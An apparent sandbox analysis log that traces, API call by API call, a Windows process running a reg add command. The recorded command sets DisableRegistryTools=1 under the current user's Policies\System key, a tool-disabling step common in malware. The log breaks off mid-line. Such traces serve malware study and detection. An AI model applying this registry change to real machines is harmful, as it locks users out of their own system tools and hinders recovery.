"\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2642 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2643 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2644 start_va = 0x480000 end_va = 0x55ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Thread: id = 183 os_tid = 0xbc8 [0276.752] GetModuleHandleA (lpModuleName=0x0) returned 0xfa0000 [0276.752] __set_app_type (_Type=0x1) [0276.752] __p__fmode () returned 0x74ac4d6c [0276.752] __p__commode () returned 0x74ac5b1c [0276.752] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xfaca50) returned 0x0 [0276.753] __wgetmainargs (in: _Argc=0xfae028, _Argv=0xfae02c, _Env=0xfae030, _DoWildCard=0, _StartInfo=0xfae03c | out: _Argc=0xfae028, _Argv=0xfae02c, _Env=0xfae030) returned 0 [0276.753] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="add", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 1 [0276.757] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="add", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0276.757] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0xdfeec | out: phkResult=0xdfeec*=0x0) returned 0x2 [0276.757] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="add", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0276.757] lstrlenW (lpString="-?|/?|-h|/h") returned 11 [0276.757] GetProcessHeap () returned 0x6c0000 [0276.757] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0xc, Size=0x10) returned 0x6c77b0 [0276.757] lstrlenW (lpString="") returned 0 [0276.757] GetProcessHeap () returned 0x6c0000 [0276.757] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0xc, Size=0x2) returned 0x6c4390 [0276.757] GetProcessHeap () returned 0x6c0000 [0276.757] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0xc, Size=0x14) returned 0x6c40d8 [0276.757] GetProcessHeap () returned 0x6c0000 [0276.758] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0xc, Size=0x10) returned 0x6c7840 [0276.758] GetProcessHeap () returned 0x6c0000 [0276.758] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0xc, Size=0x14) returned 0x6c3ea8 [0276.758] GetProcessHeap () returned 0x6c0000 [0276.758] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0xc, Size=0x14) returned 0x6c45a0 [0276.758] GetProcessHeap () returned 0x6c0000 [0276.758] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0xc, Size=0x14) returned 0x6c45c0 [0276.758] GetProcessHeap () returned 0x6c0000 [0276.758] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0xc, Size=0x14) returned 0x6c45e0 [0276.758] GetProcessHeap () returned 0x6c0000 [0276.758] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0xc, Size=0x10) returned 0x6c77f8 [0276.758] GetProcessHeap () returned 0x6c0000 [0276.758] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0xc, Size=0x14) returned 0x6c4158 [0276.758] GetProcessHeap () returned 0x6c0000 [0276.758] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0xc, Size=0x14) returned 0x6c4178 [0276.758] GetProcessHeap () returned 0x6c0000 [0276.758] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0xc, Size=0x14) returned 0x6c4198 [0276.758] GetProcessHeap () returned 0x6c0000 [0276.758] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0xc, Size=0x14) returned 0x6c3840 [0276.758] GetProcessHeap () returned 0x6c0000 [0276.758] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0xc, Size=0x10) returned 0x6c7810 [0276.758] GetProcessHeap () returned 0x6c0000 [0276.758] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0xc, Size=0x14) returned 0x6c3860 [0276.758] GetProcessHeap () returned 0x6c0000 [0276.758] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0xc, Size=0x14) returned 0x6c3880 [0276.758] GetProcessHeap () returned 0x6c0000 [0276.758] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0xc, Size=0x14) returned 0x6c4620 [0276.758] GetProcessHeap () returned 0x6c0000 [0276.758] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0xc, Size=0x14) returned 0x6c4640 [0276.758] SetThreadUILanguage (LangId=0x0) returned 0x409 [0276.778] GetProcessHeap () returned 0x6c0000 [0276.778] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0xc, Size=0x10) returned 0x6c77c8 [0276.778] _memicmp (_Buf1=0x6c77c8, _Buf2=0xfa1b04, _Size=0x7) returned 0 [0276.778] GetProcessHeap () returned 0x6c0000 [0276.778] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0xc, Size=0x1e) returned 0x6c26c0 [0276.778] lstrlenW (lpString="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 62 [0276.778] GetProcessHeap () returned 0x6c0000 [0276.778] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0xc, Size=0x10) returned 0x6c7828 [0276.778] _memicmp (_Buf1=0x6c7828, _Buf2=0xfa1b04, _Size=0x7) returned 0 [0276.778] GetProcessHeap () returned 0x6c0000 [0276.778] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0xc, Size=0x84) returned 0x6c3f28 [0276.778] _vsnwprintf (in: _Buffer=0x6c26c0, _BufferCount=0xe, _Format="|%s|", _ArgList=0xdfe00 | out: _Buffer="|-?|/?|-h|/h|") returned 13 [0276.779] _vsnwprintf (in: _Buffer=0x6c3f28, _BufferCount=0x41, _Format="|%s|", _ArgList=0xdfe00 | out: _Buffer="|HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System|") returned 64 [0276.779] lstrlenW (lpString="|-?|/?|-h|/h|") returned 13 [0276.779] lstrlenW (lpString="|HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System|") returned 64 [0276.779] RtlRestoreLastWin32Error () returned 0x490 [0276.779] lstrlenW (lpString="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 62 [0276.779] GetProcessHeap () returned 0x6c0000 [0276.779] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0xc, Size=0x7e) returned 0x6c3608 [0276.779] lstrlenW (lpString="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 62 [0276.779] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0276.779] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0276.779] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0276.779] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0276.779] StrChrW (lpStart=" \x09", wMatch=0x55) returned 0x0 [0276.779] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0276.779] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0276.779] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0276.779] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0276.779] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0276.779] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0276.779] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0276.779] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0276.779] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0276.779] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0276.779] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x56) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x50) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0276.780] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0276.781] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0276.781] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0276.781] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0276.781] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0276.781] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0277.395] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0277.395] StrChrW (lpStart=" \x09", wMatch=0x79) returned 0x0 [0277.395] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0277.395] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0277.395] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0277.395] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0277.395] lstrlenW (lpString="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 62 [0277.395] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", cchCount1=2, lpString2="\\\\", cchCount2=2) returned 3 [0277.395] lstrlenW (lpString="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 62 [0277.395] lstrlenW (lpString="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 62 [0277.395] StrChrIW (lpStart="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", wMatch=0x5c) returned="\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" [0277.396] lstrlenW (lpString="HKEY_CURRENT_CONFIG") returned 19 [0277.396] GetProcessHeap () returned 0x6c0000 [0277.396] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0xc, Size=0x28) returned 0x6c4000 [0277.396] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKCU", cchCount1=-1, lpString2="HKCU", cchCount2=-1) returned 2 [0277.396] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 57 [0277.396] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 57 [0277.396] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 57 [0277.396] StrChrIW (lpStart="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", wMatch=0x5c) returned="\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" [0277.396] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 57 [0277.396] StrChrIW (lpStart="Microsoft\\Windows\\CurrentVersion\\Policies\\System", wMatch=0x5c) returned="\\Windows\\CurrentVersion\\Policies\\System" [0277.396] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 57 [0277.396] StrChrIW (lpStart="Windows\\CurrentVersion\\Policies\\System", wMatch=0x5c) returned="\\CurrentVersion\\Policies\\System" [0277.396] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 57 [0277.396] StrChrIW (lpStart="CurrentVersion\\Policies\\System", wMatch=0x5c) returned="\\Policies\\System" [0277.396] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 57 [0277.396] StrChrIW (lpStart="Policies\\System", wMatch=0x5c) returned="\\System" [0277.396] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 57 [0277.396] StrChrIW (lpStart="System", wMatch=0x5c) returned 0x0 [0277.396] RtlRestoreLastWin32Error () returned 0x490 [0277.396] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 57 [0277.397] RtlRestoreLastWin32Error () returned 0x0 [0277.397] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 57 [0277.397] GetProcessHeap () returned 0x6c0000 [0277.397] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0xc, Size=0x74) returned 0x6c3690 [0277.397] GetProcessHeap () returned 0x6c0000 [0277.397] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0xc, Size=0xa0) returned 0x6c8d90 [0277.397] GetProcessHeap () returned 0x6c0000 [0277.397] GetProcessHeap () returned 0x6c0000 [0277.397] HeapValidate (hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6c4000) returned 1 [0277.397] GetProcessHeap () returned 0x6c0000 [0277.397] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6c4000) returned 0x28 [0277.397] RtlFreeHeap (HeapHandle=0x6c0000, Flags=0x0, BaseAddress=0x6c4000) returned 1 [0277.398] GetProcessHeap () returned 0x6c0000 [0277.398] GetProcessHeap () returned 0x6c0000 [0277.398] HeapValidate (hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6c3608) returned 1 [0277.398] GetProcessHeap () returned 0x6c0000 [0277.398] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6c3608) returned 0x7e [0277.398] RtlFreeHeap (HeapHandle=0x6c0000, Flags=0x0, BaseAddress=0x6c3608) returned 1 [0277.398] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 2 [0277.400] lstrlenW (lpString="DisableRegistryTools") returned 20 [0277.400] GetProcessHeap () returned 0x6c0000 [0277.400] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0xc, Size=0x2a) returned 0x6c4220 [0277.400] lstrlenW (lpString="DisableRegistryTools") returned 20 [0277.400] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0277.400] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0277.400] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0277.400] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0277.400] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0277.400] StrChrW (lpStart=" \x09", wMatch=0x62) returned 0x0 [0277.400] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0277.400] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0277.400] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0277.400] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0277.401] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0277.401] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0277.401] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0277.401] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0277.401] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0277.401] StrChrW (lpStart=" \x09", wMatch=0x79) returned 0x0 [0277.401] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0277.401] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0277.401] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0277.401] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0277.401] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0277.401] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0277.401] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0277.401] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0277.401] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0277.401] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 2 [0277.401] StrDupW (lpSrch="REG_DWORD") returned="REG_DWORD" [0277.401] lstrlenW (lpString="REG_DWORD") returned 9 [0277.401] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0277.401] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0277.401] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0277.401] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0277.401] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0277.401] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0277.401] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0277.401] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0277.401] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0277.401] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0277.401] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_DWORD", cchCount1=-1, lpString2="REG_SZ", cchCount2=-1) returned 1 [0277.401] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_DWORD", cchCount1=-1, lpString2="REG_EXPAND_SZ", cchCount2=-1) returned 1 [0277.401] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_DWORD", cchCount1=-1, lpString2="REG_MULTI_SZ", cchCount2=-1) returned 1 [0277.402] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_DWORD", cchCount1=-1, lpString2="REG_BINARY", cchCount2=-1) returned 3 [0277.402] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_DWORD", cchCount1=-1, lpString2="REG_DWORD", cchCount2=-1) returned 2 [0277.402] LocalFree (hMem=0x6c9448) returned 0x0 [0277.402] RtlRestoreLastWin32Error () returned 0x0 [0277.402] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0277.402] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0277.402] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0277.402] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0277.402] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0277.402] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0277.402] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0277.402] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0277.402] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 2 [0277.402] lstrlenW (lpString="1") returned 1 [0277.402] GetProcessHeap () returned 0x6c0000 [0277.402] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0xc, Size=0x4) returned 0x6c26e8 [0277.402] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0277.402] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0277.402] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0277.402] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0277.402] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0277.402] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0277.402] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0277.402] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0277.402] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 3 [0277.402] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-d", cchCount2=-1) returned 1 [0277.402] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/f", cchCount2=-1) returned 2 [0277.402] RtlRestoreLastWin32Error () returned 0x0 [0277.402] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0xdfe9c, lpdwDisposition=0xdfe6c | out: phkResult=0xdfe9c*=0xac, lpdwDisposition=0xdfe6c*=0x1) returned 0x0 [0277.403] RegQueryValueExW (in: hKey=0xac, lpValueName="DisableRegistryTools", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x2 [0277.403] GetThreadLocale () returned 0x409 [0277.403] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="1", cchCount1=2, lpString2="0x", cchCount2=2) returned 3 [0277.403] _memicmp (_Buf1=0x6c77c8, _Buf2=0xfa1b04, _Size=0x7) returned 0 [0277.403] lstrlenW (lpString="1") returned 1 [0277.403] lstrlenW (lpString="1") returned 1 [0277.403] StrChrW (lpStart=" \x09", wMatch=0x31) returned 0x0 [0277.403] StrChrW (lpStart=" \x09", wMatch=0x31) returned 0x0 [0277.403] lstrlenW (lpString="1") returned 1 [0277.403] _errno () returned 0x9a05b0 [0277.403] _errno () returned 0x9a05b0 [0277.403] lstrlenW (lpString="") returned 0 [0277.403] _memicmp (_Buf1=0x6c77c8, _Buf2=0xfa1b04, _Size=0x7) returned 0 [0277.403] lstrlenW (lpString="1") returned 1 [0277.403] lstrlenW (lpString="1") returned 1 [0277.404] StrChrW (lpStart=" \x09", wMatch=0x31) returned 0x0 [0277.404] StrChrW (lpStart=" \x09", wMatch=0x31) returned 0x0 [0277.404] lstrlenW (lpString="1") returned 1 [0277.404] _errno () returned 0x9a05b0 [0277.404] _errno () returned 0x9a05b0 [0277.404] lstrlenW (lpString="") returned 0 [0277.404] RegSetValueExW (in: hKey=0xac, lpValueName="DisableRegistryTools", Reserved=0x0, dwType=0x4, lpData=0xdfe80*=0x1, cbData=0x4 | out: lpData=0xdfe80*=0x1) returned 0x0 [0277.404] RegCloseKey (hKey=0xac) returned 0x0 [0277.404] GetProcessHeap () returned 0x6c0000 [0277.404] GetProcessHeap () returned 0x6c0000 [0277.404] HeapValidate (hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6c3690) returned 1 [0277.404] GetProcessHeap () returned 0x6c0000 [0277.404] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6c3690) returned 0x74 [0277.405] RtlFreeHeap (HeapHandle=0x6c0000, Flags=0x0, BaseAddress=0x6c3690) returned 1 [0277.405] GetProcessHeap () returned 0x6c0000 [0277.405] GetProcessHeap () returned 0x6c0000 [0277.405] HeapValidate (hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6c8d90) returned 1 [0277.405] GetProcessHeap () returned 0x6c0000 [0277.405] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6c8d90) returned 0xa0 [0277.405] RtlFreeHeap (HeapHandle=0x6c0000, Flags=0x0, BaseAddress=0x6c8d90) returned 1 [0277.405] GetProcessHeap () returned 0x6c0000 [0277.405] GetProcessHeap () returned 0x6c0000 [0277.405] HeapValidate (hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6c4220) returned 1 [0277.405] GetProcessHeap () returned 0x6c0000 [0277.405] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6c4220) returned 0x2a [0277.405] RtlFreeHeap (HeapHandle=0x6c0000, Flags=0x0, BaseAddress=0x6c4220) returned 1 [0277.405] GetProcessHeap () returned 0x6c0000 [0277.405] GetProcessHeap () returned 0x6c0000 [0277.406] HeapValidate (hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6c26e8) returned 1 [0277.406] GetProcessHeap () returned 0x6c0000 [0277.406] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6c26e8) returned 0x4 [0277.406] RtlFreeHeap (HeapHandle=0x6c0000, Flags=0x0, BaseAddress=0x6c26e8) returned 1 [0277.406] RtlRestoreLastWin32Error () returned 0x0 [0277.406] GetLastError () returned 0x0 [0277.406] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0xdfe48, nSize=0x0, Arguments=0x0 | out: lpBuffer="㘸l8\r⪢ú屦ú൰\x9a") returned 0x27 [0277.412] GetLastError () returned 0x0 [0277.412] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0277.412] GetProcessHeap () returned 0x6c0000 [0277.412] GetProcessHeap () returned 0x6c0000 [0277.412] HeapValidate (hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6c4390) returned 1 [0277.412] GetProcessHeap () returned 0x6c0000 [0277.412] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6c4390) returned 0x2 [0277.412] RtlFreeHeap (HeapHandle=0x6c0000, Flags=0x0, BaseAddress=0x6c4390) returned 1 [0277.412] GetProcessHeap () returned 0x6c0000 [0277.412] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0xc, Size=0x50) returned 0x6c3690 [0277.412] RtlRestoreLastWin32Error () returned 0x0 [0277.413] LocalFree (hMem=0x6c3638) returned 0x0 [0277.413] __iob_func () returned 0x74ac1208 [0277.413] _fileno (_File=0x74ac1228) returned 1 [0277.413] _errno () returned 0x9a05b0 [0277.413] _get_osfhandle (_FileHandle=1) returned 0x3c [0277.413] _errno () returned 0x9a05b0 [0277.413] GetFileType (hFile=0x3c) returned 0x2 [0277.413] GetStdHandle 